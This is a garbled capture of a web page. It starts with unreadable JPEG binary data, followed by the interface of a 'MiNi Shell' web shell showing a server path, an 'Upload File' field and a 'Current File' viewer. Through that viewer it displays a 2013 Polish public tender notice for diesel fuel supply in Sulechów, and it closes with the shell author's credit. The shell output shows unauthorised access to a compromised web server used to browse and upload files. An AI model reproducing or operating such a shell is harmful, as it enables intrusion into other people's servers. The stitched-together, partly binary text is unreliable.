JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131021/427244-N-2013.html

<p class="kh_header"><b>Sulechów: Dostawa oleju napędowego</b><br>
<b>Numer ogłoszenia: 427244 - 2013; data zamieszczenia: 21.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sulechowskie Przedsiębiorstwo Komunalne "SuPeKom" Sp. z o.o. , ul. Poznańska 18, 66-100 Sulechów, woj. lubuskie, tel. 068 3852407 w. 49, faks 068 3852370.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.supekom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o. o. ze 100% udziałem Gminy Sulechów.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa oleju napędowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa oleju napędowego do pojazdów i sprzętu Sulechowskiego Przedsiębiorstwa Komunalnego >SuPeKom< Sp. z o. o. w Sulechowie w szacunkowej ilości: 52 600 litrów. Zapotrzebowanie na zamówiony olej napędowy może ulec zmianie (zmniejszeniu lub zwiększeniu) w zależności od bieżących potrzeb Zamawiającego w czasie trwania umowy, jednakże ostateczna kwota wynagrodzenia nie może przekroczyć ogólnej wartości przedmiotu umowy. Ilość dostarczanego oleju napędowego, wskazana powyżej, jest ilością orientacyjną, stąd w przypadku ograniczenia przez Zamawiającego ilości zakupionego oleju napędowego w stosunku do zamówionego, nie będzie to uznane przez Wykonawcę za odstąpienie od umowy i tym samym Wykonawca nie będzie miał prawa do dochodzenia od Zamawiającego odszkodowania z tytułu zakupu mniejszej ilości oleju napędowego. Zamawiający zapewnia, że gwarantowana minimalna ilość  zakupionego przez niego oleju napędowego wyniesie 35 000 litrów, pozostała część szacowanego do zakupu oleju napędowego zostanie zakupiona w zależności od bieżących potrzeb Zamawiającego. 2. Dostawa oleju napędowego następować będzie przez zatankowanie pojazdów i sprzętu Zamawiającego na podstawie kart drogowych lub kart pracy sprzętu, w których Wykonawca każdorazowo dokona adnotacji o wielkości sprzedaży. W przypadku tankowania pojazdów i sprzętu oraz poboru paliwa do beczki lub kanistra dostawa paliw musi następować na podstawie wcześniej dostarczonego, sukcesywnie aktualizowanego, wykazu pracowników podpisanego przez Zamawiającego. W sytuacjach wyjątkowych Zamawiający zastrzega sobie możliwość telefonicznego powiadomienia Wykonawcy o upoważnieniu pracownika do pobrania paliwa. Jednocześnie Zamawiający zobowiązany jest do dostarczenia Wykonawcy nowego wykazu pracowników upoważnionych do tankowania oleju napędowego. Dopuszczalne jest również tankowanie pojazdów i sprzętu Zamawiającego przy użyciu elektronicznych kart paliwowych wystawianych na numer rejestracyjny samochodu lub imię i nazwisko kierowcy lub nazwę Zamawiającego, z zastrzeżeniem, że każdorazowo wraz z fakturą Wykonawca ma obowiązek dostarczać dowody wydania paliwa w formie wydruku z systemu obsługującego karty paliwowe na stacjach paliw. Uwaga: Zamawiający zastrzega, że stacje paliw na których odbywać się będzie tankowanie pojazdów i sprzętu Zamawiającego nie mogą znajdować się w odległości większej niż 5 km od siedziby Zamawiającego (ul. Poznańska 18, 66-100 Sulechów). 3. Wyszczególniony w pkt. 1 olej napędowy musi odpowiadać standardom określonym w obowiązujących normach (Rozporządzenie Ministra Gospodarki z dnia 9 grudnia 2008r. w sprawie wymagań jakościowych dla paliw ciekłych - tekst jednolity: Dz. U. z 2013, poz. 1058). 4. Olej napędowy musi być zgodny z normą ON PN-EN 590, tj. być przeznaczony do stosowania w silnikach typu samochodowego o zapłonie samoczynnym (Diesla). 5. Jeżeli Zamawiający stwierdzi, że zła jakość oleju napędowego była przyczyną awarii lub zniszczenia części, urządzeń - Wykonawca zobowiązany będzie do pokrycia strat, jakie z tego tytułu poniesie Zamawiający. W takim przypadku przeprowadzona zostanie następująca procedura: Zamawiający pobierze z pojazdu lub sprzętu próbki paliwa do badania w obecności przedstawiciela Wykonawcy, zobowiązanego do niezwłocznego stawienia się na miejsce poboru próbek po uprzednim telefonicznym lub pisemnym powiadomieniu o poborze. Pobrane próbki zostaną zabezpieczone w sposób uzgodniony przez strony (zaplombowane, zabezpieczone taśmą z podpisami i pieczątkami stron, itp.), a następnie w sposób uzgodniony przez strony przesłane lub przewiezione do laboratorium w terminie nie dłuższym niż 3 dni robocze od dnia ich pobrania. Jeżeli przedstawiciel Wykonawcy nie pojawi się na miejscu poboru próbek, uzna się, że Wykonawca wyraża zgodę na pobór próbek bez jego obecności i tym samym, że nie kwestionuje prawidłowości ich poboru oraz nie kwestionuje identyczności materiału oddanego do badania, z tym który został pobrany. W przypadku gdy wyniki badań wykażą, że olej napędowy nie spełnia wymagań określonych przepisami prawa koszty ich wykonania obciążą Wykonawcę, w przeciwnym wypadku koszty poniesie Zamawiający. W przypadku gdy zostanie stwierdzone, że olej napędowy nie spełnia wymagań określonych przepisami prawa Wykonawca będzie zobowiązany do pokrycia strat, jakie Zamawiający poniósł z tytułu awarii lub zniszczenia części, urządzeń, na co Zamawiający przedstawi odpowiednie kserokopie dowodów księgowych. W celu potwierdzenia dostarczania przez Wykonawcę odpowiedniej jakości paliwa do pojazdów i sprzętu Zamawiającego, Zamawiający ma prawo w każdym czasie trwania umowy w obecności przedstawiciela Wykonawcy dokonać poboru próbek oleju napędowego do badania bezpośrednio ze stacji paliw, na której odbywa się tankowanie pojazdów i sprzętu. Procedura zabezpieczenia i oddania próbek do badania przebiegać będzie identycznie jak wyżej opisano. 6. Zamawiający zastrzega możliwość żądania od Wykonawcy dostarczenia charakterystyk dostarczanego Zamawiającemu oleju napędowego. 7. Wykonawca będzie prowadził ewidencję wydanego oleju napędowego na drukach dostarczonych przez Zamawiającego i potwierdzoną pisemnie przez pobierającego. Dopuszczalne jest również prowadzenie ewidencji przy użyciu elektronicznego systemu z wykorzystaniem elektronicznych kart paliwowych, pod warunkiem, że wydruki przygotowane w oparciu o system elektroniczny będą zawierały m.in.: - datę tankowania, - imię i nazwisko kierowcy, - markę pojazdu, - numer rejestracyjny, - ilość pobranego oleju napędowego, i zgodnie z pkt 13 dostarczane co tydzień wraz z fakturą wystawioną po realizacji zamówienia. 8. Wielkość i termin tankowania pojazdów i sprzętu Zamawiającego wynikać będzie z jednostronnych dyspozycji Zamawiającego. 9. Wykonawca, po przekroczeniu przez Zamawiającego kwoty zakupu oleju napędowego, w wysokości 190 000,00 zł netto,  zobowiązany jest do codziennego przesyłania drogą mailową lub telefoniczną,  informacji dotyczącej ilości i wartości, wydanego pracownikom Zamawiającego w danym dniu, oleju napędowego. 10. Wykonawca zobowiązany jest do zapewnienia ciągłości realizacji zamówienia w inny sposób (np. na innej stacji paliw), w sytuacji, gdy nie będzie mógł świadczyć dostaw, z zastrzeżeniem, że w takiej sytuacji koszt realizacji zamówienia nie ulegnie zwiększeniu, a zastępcza stacja paliw nie będzie znajdować się w odległości większej niż 5 km od siedziby Zamawiającego. 11. W sytuacji, kiedy Wykonawca nie będzie mógł realizować dostaw i nie wskaże innej stacji paliw, ani innego sposobu realizacji zamówienia w terminie max. do 3h od momentu zaistnienia okoliczności uniemożliwiających realizację dostaw,  Zamawiający sam dokona wyboru zastępczej stacji paliw, z zastrzeżeniem że nie będzie się ona znajdować w odległości większej niż 5km od siedziby Zamawiającego. Koszty tankowania na zastępczej stacji paliw pozostaną zgodne z warunkami zawartymi w umowie i  nie będą mogły ulec zwiększeniu. W przypadku wyższej ceny ON na zastępczej stacji paliw, różnicą kosztów tankowania między ceną dnia na zastępczej stacji paliw, a ceną określoną w umowie, Zamawiający obciąży Wykonawcę umownego. 12. Rozliczenie za przedmiot dostawy odbywać się będzie na podstawie cen hurtowych oleju napędowego, publikowanych na stronie internetowej producenta, z dnia zakupu powiększonych o stałą marżę Wykonawcy, zaoferowaną w ofercie przetargowej. W przypadku, gdy w dniu zakupu oleju napędowego nie zostaną opublikowane ceny hurtowe oleju napędowego na stronie internetowej producenta, wówczas rozliczenie za przedmiot dostawy odbywać się będzie na podstawie ceny hurtowej oleju napędowego opublikowanej na stronie internetowej producenta z ostatniego dnia - w którym opublikowano ceny - przed dokonaniem zakupu. 13. Wykonawca zobowiązany jest do wystawiania faktur nie rzadziej niż raz w tygodniu, po realizacji zamówienia, z wyszczególnieniem ilości sprzedanego oleju napędowego, daty sprzedaży oraz ceny producenta powiększonej o stałą marżę Wykonawcy. Dodatkowo do każdej wystawionej faktury Wykonawca dołączy wydruk z cenami ze strony internetowej producenta potwierdzający zmianę cen. 14. Każdy Wykonawca zobowiązany jest do podania w formularzu ofertowym nazwy Koncernu Naftowego, którego paliwa będzie dostarczał Zamawiającemu. W przypadku zmiany, w trakcie trwania umowy Koncernu Naftowego, od którego paliwa będą dostarczane Zamawiającemu, Wykonawca zobowiązany jest niezwłocznie, pisemnie powiadomić o tym fakcie Zamawiającego, przy czym zmiany te nie mogą być częstsze niż raz w miesiącu. Do powiadomienia o zmianie Koncernu Naftowego Wykonawca załączy stosowne dokumenty potwierdzające powyższy fakt.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 09.13.41.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje konieczności wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeśli złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy PZP oraz złoży aktualną koncesję na obrót paliwami ciekłymi, wydaną przez prezesa Urzędu Regulacji Energetyki zgodnie z ustawą z dnia 10 kwietnia 1997 r. Prawo Energetyczne (tekst jednolity: Dz. U. z 2012 r., poz. 1059 z późniejszymi zmianami).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeśli złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeśli złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy PZP oraz złoży oświadczenie, że jego baza zaopatrzeniowa nie znajduje się w odległości większej niż 5km od siedziby Zamawiającego usytuowanej przy ulicy Poznańskiej 18 w Sulechowie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeśli złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeśli złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy PZP.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oferta Wykonawcy. 2. Dane Wykonawcy. 3. Oświadczenie, że baza zaopatrzeniowa Wykonawcy nie znajduje się w odległości większej niż 5km od siedziby Zamawiającego usytuowanej przy ulicy Poznańskiej 18 w Sulechowie. 4. Oświadczenie Wykonawcy dotyczące Koncernu Naftowego, od którego olej napędowy będzie dostarczany Zamawiającemu wraz z podaniem adresu strony internetowej, na której publikowane są ceny oleju napędowego tego Koncernu. 5. Prawnie ustanowione pełnomocnictwo, o którym mowa w pkt 8.5. SIWZ. 6. W przypadku Wykonawców polegających na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy PZP, w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia zgodnie z wytycznymi zawartymi w pkt 9.3. SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza w trakcie trwania umowy zmianę jej postanowień, która polegać może na: - zmianie nazwy (np. w przypadku przejęcia jednego podmiotu przez drugi), adresu / siedziby Zamawiającego / Wykonawcy, - zmianie osób występujących po stronie Zamawiającego / Wykonawcy, - zmianie wynagrodzenia Wykonawcy w związku z zakupem przez Zamawiającego mniejszej ilości paliwa niż podana szacunkowa ilość, - zmianie (zwiększeniu lub zmniejszeniu) ilości zakupionego paliwa przy założeniu, że ostateczna kwota wynagrodzenia nie przekroczy ogólnej wartości przedmiotu umowy, - zmianie wynagrodzenia Wykonawcy w związku ze zmianą stawki podatku od towarów i usług VAT. 2. Warunkiem dokonania zmian, o których mowa powyżej, jest złożenie wniosku przez stronę inicjującą zmianę zawierającego co najmniej opis zmian, uzasadnienie zmian i dokumenty potwierdzające zaistnienie zmian oraz obliczenie kosztów zmiany, jeżeli zmiana ta będzie miała wpływ na wynagrodzenie Wykonawcy. 3. Potwierdzeniem dokonania zmian w umowie będzie podpisany przez strony aneks do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://supekom.bip.sulechow.pl  sekcja: Zamówienia publiczne / Wg ustawy PZP / 2013<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> bezpłatnie - do pobrania ze strony internetowej Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2013 godzina 10:00, miejsce: Sulechowskie Przedsiębiorstwo Komunalne >SuPeKom< Sp. z o. o., ul. Poznańska 18, 66-100 Sulechów, II piętro, pokój nr 23 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com